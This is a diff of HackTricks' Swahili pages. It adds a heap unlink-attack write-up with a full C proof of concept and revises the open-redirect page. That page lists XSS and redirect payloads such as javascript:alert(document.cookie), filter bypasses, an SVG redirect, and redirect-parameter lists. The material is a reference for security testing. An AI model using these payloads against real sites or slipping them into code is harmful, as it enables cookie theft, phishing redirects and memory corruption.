<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

139
binary-exploitation/heap/unlink-attack.md Normal file
View file

@ -0,0 +1,139 @@
# Shambulio la Unlink
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
Wakati shambulio hili lilipogunduliwa kwa kiasi kikubwa iliruhusu WWW (Andika Nini Wapi), hata hivyo, **uchunguzi fulani uliongezwa** ukifanya toleo jipya la shambulio kuwa la kuvutia zaidi na **ngumu zaidi na **hakinafaidishi**.
### Mfano wa Kanuni:
<details>
<summary>Kanuni</summary>
```c
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
// Altered from https://github.com/DhavalKapil/heap-exploitation/tree/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/unlink_exploit.c to make it work
struct chunk_structure {
size_t prev_size;
size_t size;
struct chunk_structure *fd;
struct chunk_structure *bk;
char buf[10]; // padding
};
int main() {
unsigned long long *chunk1, *chunk2;
struct chunk_structure *fake_chunk, *chunk2_hdr;
char data[20];
// First grab two chunks (non fast)
chunk1 = malloc(0x8000);
chunk2 = malloc(0x8000);
printf("Stack pointer to chunk1: %p\n", &chunk1);
printf("Chunk1: %p\n", chunk1);
printf("Chunk2: %p\n", chunk2);
// Assuming attacker has control over chunk1's contents
// Overflow the heap, override chunk2's header
// First forge a fake chunk starting at chunk1
// Need to setup fd and bk pointers to pass the unlink security check
fake_chunk = (struct chunk_structure *)chunk1;
fake_chunk->size = 0x8000;
fake_chunk->fd = (struct chunk_structure *)(&chunk1 - 3); // Ensures P->fd->bk == P
fake_chunk->bk = (struct chunk_structure *)(&chunk1 - 2); // Ensures P->bk->fd == P
// Next modify the header of chunk2 to pass all security checks
chunk2_hdr = (struct chunk_structure *)(chunk2 - 2);
chunk2_hdr->prev_size = 0x8000; // chunk1's data region size
chunk2_hdr->size &= ~1; // Unsetting prev_in_use bit
// Now, when chunk2 is freed, attacker's fake chunk is 'unlinked'
// This results in chunk1 pointer pointing to chunk1 - 3
// i.e. chunk1[3] now contains chunk1 itself.
// We then make chunk1 point to some victim's data
free(chunk2);
printf("Chunk1: %p\n", chunk1);
printf("Chunk1[3]: %x\n", chunk1[3]);
chunk1[3] = (unsigned long long)data;
strcpy(data, "Victim's data");
// Overwrite victim's data using chunk1
chunk1[0] = 0x002164656b636168LL;
printf("%s\n", data);
return 0;
}
```
</details>
* Shambulizi halifanyi kazi ikiwa tcaches zinatumika
### Lengo
* Badilisha kipande cha kidole kwa kipande kwenye stakishi ili ielekeze kwenye stakishi ili iwezekane kubadilisha maudhui ya stakishi kwa kuandika kwenye kipande
### Mahitaji
* Udhibiti fulani katika kumbukumbu (k.m. stakishi) ili uweze kuunda vikundi vichache kwa kutoa thamani kwa baadhi ya sifa.
* Kuvuja kwa stakishi ili kuweza kuweka viashiria vya kipande bandia.
### Shambulizi
* Kuna vikundi vichache (kikundi1 na kikundi2)
* Mshambuliaji anadhibiti maudhui ya kikundi1 na vichwa vya kikundi2.
* Katika kikundi1 mshambuliaji anaunda muundo wa kipande bandia:
* Ili kuepuka ulinzi anahakikisha kuwa uga `ukubwa` ni sahihi ili kuepuka kosa: `ukubwa ulioharibika dhidi ya ukubwa uliopita wakati wa kufanya kazi`
* na viashiria `fd` na `bk` vya kipande bandia vinawaelekeza kwenye eneo ambapo kipande1 pointer kimehifadhiwa kwa vipimo vya -3 na -2 mtawalia hivyo `kikundi_bandia->fd->bk` na `kikundi_bandia->bk->fd` vinawaelekeza kwenye nafasi kwenye kumbukumbu (stakishi) ambapo anwani halisi ya kikundi1 iko:
<figure><img src="../../.gitbook/assets/image (1245).png" alt=""><figcaption><p><a href="https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit">https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit</a></p></figcaption></figure>
* Vichwa vya kikundi2 vinabadilishwa kuonyesha kuwa kipande kilichopita hakijatumika na kwamba ukubwa ni ukubwa wa kipande bandia kilichomo.
* Wakati kipande cha pili kinapofutwa basi kipande bandia hiki kinatenganishwa kutokea:
* `kikundi_bandia->fd->bk` = `kikundi_bandia->bk`
* `kikundi_bandia->bk->fd` = `kikundi_bandia->fd`
* Awali ilifanywa kuwa `kikundi_bandia->fd->bk` na `kikundi_bandia->fd->bk` vinawaelekeza kwenye eneo moja (eneo kwenye stakishi ambapo `kikundi1` ilihifadhiwa, hivyo ilikuwa orodha halali). Kwa kuwa **zote zinaelekeza kwenye eneo moja** ni ile ya mwisho (`kikundi_bandia->bk->fd = kikundi_bandia->fd`) itakayochukua **athari**.
* Hii ita**badilisha anwani ya kipande1 kwenye stakishi kwenda kwenye anwani (au herufi) iliyohifadhiwa vipimo 3 kabla kwenye stakishi**.
* Hivyo, ikiwa mshambuliaji anaweza kudhibiti tena maudhui ya kikundi1, ataweza **kuandika ndani ya stakishi** akiweza kubadilisha anwani ya kurudi akiruka kifaa cha ulinzi na kubadilisha thamani na viashiria vya mchanganyiko wa ndani. Hata kubadilisha tena anwani ya kikundi1 iliyohifadhiwa kwenye stakishi kwenda eneo tofauti ambapo ikiwa mshambuliaji anaweza kudhibiti tena maudhui ya kikundi1 ataweza kuandika popote.
<figure><img src="../../.gitbook/assets/image (1246).png" alt=""><figcaption><p><a href="https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit">https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit</a></p></figcaption></figure>
## Marejeo
* [https://heap-exploitation.dhavalkapil.com/attacks/unlink\_exploit](https://heap-exploitation.dhavalkapil.com/attacks/unlink\_exploit)
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

143
pentesting-web/open-redirect.md
View file

@ -1,25 +1,28 @@
# Uelekezaji wa Wazi
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Uelekezaji wa Wazi
# Uelekeze kwa localhost au anwani zisizo na kikomo
### Uelekezaji kwa localhost au uwanja wa kiholela
{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
{% endcontent-ref %}
## Uelekeze wazi kwa XSS
### Uelekezaji wa Wazi kwa XSS
```bash
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)
@ -27,6 +30,9 @@ javascript:alert(1)
#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)
# Abuse bad subdomain filter
javascript://sub.domain.com/%0Aalert(1)
#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)
@ -62,33 +68,7 @@ javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```
# Kufungua Uelekezaji kwa kupakia faili za svg
## Maelezo
Uelekezaji wazi ni kasoro ya usalama inayoruhusu mtumiaji kudanganywa kubofya kiungo ambacho kinawaelekeza kwenye tovuti nyingine. Katika kesi hii, tunazingatia kasoro ya uelekezaji wazi inayotokea wakati faili ya SVG inapakiwa kwenye tovuti.
## Utekelezaji
1. Kwanza, tunahitaji kupata tovuti ambayo inaruhusu kupakia faili za SVG.
2. Tumia kivinjari cha wavuti au zana ya upimaji wa usalama kama Burp Suite kufanya uchunguzi wa tovuti hiyo.
3. Tafuta sehemu ya tovuti ambapo faili za SVG zinapakiwa.
4. Pakia faili ya SVG iliyoundwa na kiungo cha uelekezaji wazi. Kiungo hiki kinapaswa kuwa kama ifuatavyo:
```html
<svg onload="location.href='http://www.malicious-website.com'"></svg>
```
5. Baada ya kupakia faili ya SVG, angalia ikiwa kiungo cha uelekezaji wazi kimefanya kazi kwa kuchunguza ikiwa kuna ombi la GET kwa tovuti mbaya iliyotajwa katika kiungo.
## Kuzuia
Ili kuzuia kasoro ya uelekezaji wazi, unaweza kuchukua hatua zifuatazo:
- Thibitisha na ukague kwa uangalifu data inayopokelewa kutoka kwa mtumiaji kabla ya kuitumia kama kiungo cha uelekezaji.
- Tumia njia za uthibitishaji wa kiungo ili kuhakikisha kuwa kiungo kinawaelekeza tu kwenye tovuti zilizoidhinishwa.
- Tumia vikwazo vya faili na aina ya faili ili kuzuia kupakia faili hatari kama SVG.
- Endelea kusasisha na kurekebisha programu na mifumo yako ili kuzuia kasoro za usalama zinazoweza kusababisha uelekezaji wazi.
## Kuelekeza wazi kupakia faili za svg
```markup
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
@ -98,17 +78,7 @@ xmlns="http://www.w3.org/2000/svg">
</svg>
</code>
```
# Vigezo vya kuingiza kawaida
When testing for open redirect vulnerabilities, it is important to understand common injection parameters that can be exploited. These parameters are often found in the URL or in the request body. Here are some common injection parameters to look out for:
- **url**: This parameter is used to specify the target URL. Attackers can manipulate this parameter to redirect users to malicious websites.
- **redirect**: This parameter is used to specify the redirect URL. Attackers can modify this parameter to redirect users to a different location.
- **next**: This parameter is commonly used in login and authentication flows to redirect users after successful authentication. Attackers can abuse this parameter to redirect users to malicious sites.
- **return**: Similar to the **next** parameter, this parameter is used to redirect users after a successful action. Attackers can exploit this parameter to redirect users to malicious destinations.
- **callback**: This parameter is often used in JSONP (JSON with Padding) requests to specify a callback function. Attackers can manipulate this parameter to redirect users to malicious sites.
By understanding these common injection parameters, you can effectively test for open redirect vulnerabilities and protect your web applications from potential attacks.
## Vigezo vya kawaida vya kuingiza
```
/{payload}
?next={payload}
@ -183,69 +153,19 @@ RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
```
# Mifano ya nambari
## Mifano ya nambari
### .Net
#### .Net
```bash
response.redirect("~/mysafe-subdomain/login.aspx")
```
### Java
Java ni lugha ya programu inayotumika sana kwa maendeleo ya programu za kompyuta. Inajulikana kwa usalama wake na uwezo wake wa kufanya kazi kwenye majukwaa tofauti. Hapa kuna baadhi ya mbinu za kawaida za udukuzi zinazohusiana na Java:
#### Open Redirect
Open Redirect ni mbinu ya udukuzi ambapo mtumiaji anaelekezwa kutoka kwenye tovuti moja hadi nyingine kupitia kiungo kilicho na udanganyifu. Hii inaweza kufanyika kwa kutumia parameter ya URL ambayo inaruhusu mtumiaji kubadilisha URL ya mwisho.
Mara nyingi, mbinu hii inaweza kutumiwa kwa njia mbalimbali za kijamii za udukuzi, kama vile kudanganya mtumiaji kubofya kiungo ambacho kinamwongoza kwenye tovuti ya udanganyifu au kudanganya mtumiaji kuingia maelezo yao ya siri kwenye tovuti ya udanganyifu.
Kwa mfano, ikiwa tovuti ina parameter ya URL inayoitwa "redirect", mtumiaji anaweza kubadilisha URL ya mwisho kwa kuongeza kiungo cha udanganyifu. Hii inaweza kusababisha mtumiaji kuwa na imani kwamba wanahamishwa kwenye tovuti halali, wakati wanapelekwa kwenye tovuti ya udanganyifu.
Kuzuia mbinu hii ya udukuzi, ni muhimu kufanya ukaguzi wa kina wa parameter za URL na kuhakikisha kuwa kiungo cha mwisho kinabaki ndani ya tovuti halali.
#### Java
```bash
response.redirect("http://mysafedomain.com");
```
### PHP
#### PHP
#### Open Redirect
Open Redirect is a vulnerability that allows an attacker to redirect users from a trusted website to a malicious website. This can be exploited by manipulating the URL parameters or user input.
##### Exploiting Open Redirect Vulnerabilities
To exploit an open redirect vulnerability, follow these steps:
1. Identify the vulnerable parameter or user input that is used to construct the redirect URL.
2. Craft a malicious URL by modifying the value of the vulnerable parameter to point to the attacker's website.
3. Send the malicious URL to the target user, enticing them to click on it.
4. When the user clicks on the malicious URL, they will be redirected to the attacker's website.
##### Example
Suppose there is a website that has an open redirect vulnerability in the `redirect` parameter. The vulnerable URL looks like this:
```
https://example.com/redirect?url=<redirect_url>
```
To exploit this vulnerability, an attacker can craft a malicious URL like this:
```
https://example.com/redirect?url=https://malicious-website.com
```
When the target user clicks on this URL, they will be redirected to `https://malicious-website.com`.
##### Mitigation
To mitigate open redirect vulnerabilities, follow these best practices:
1. Validate and sanitize user input to prevent malicious URLs from being constructed.
2. Implement a whitelist approach for redirect URLs, allowing only trusted domains.
3. Use server-side checks to verify the validity of redirect URLs.
4. Educate users about the risks of clicking on unknown or suspicious URLs.
By following these practices, you can reduce the risk of open redirect vulnerabilities in your PHP applications.
PHP ni lugha ya programu ya upande wa seva inayotumiwa sana kwa maendeleo ya wavuti.
```php
<?php
/* browser redirections*/
@ -253,28 +173,27 @@ header("Location: http://mysafedomain.com");
exit;
?>
```
# Vifaa
## Vifaa
* [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)
# Vyanzo
## Vyanzo
* Katika [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) unaweza kupata orodha za kufanya majaribio ya kuingiza data.\
* [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)\
* Katika [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) unaweza kupata orodha za kufanya majaribio ya kuingiza data.\\
* [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)\\
* [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
* [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>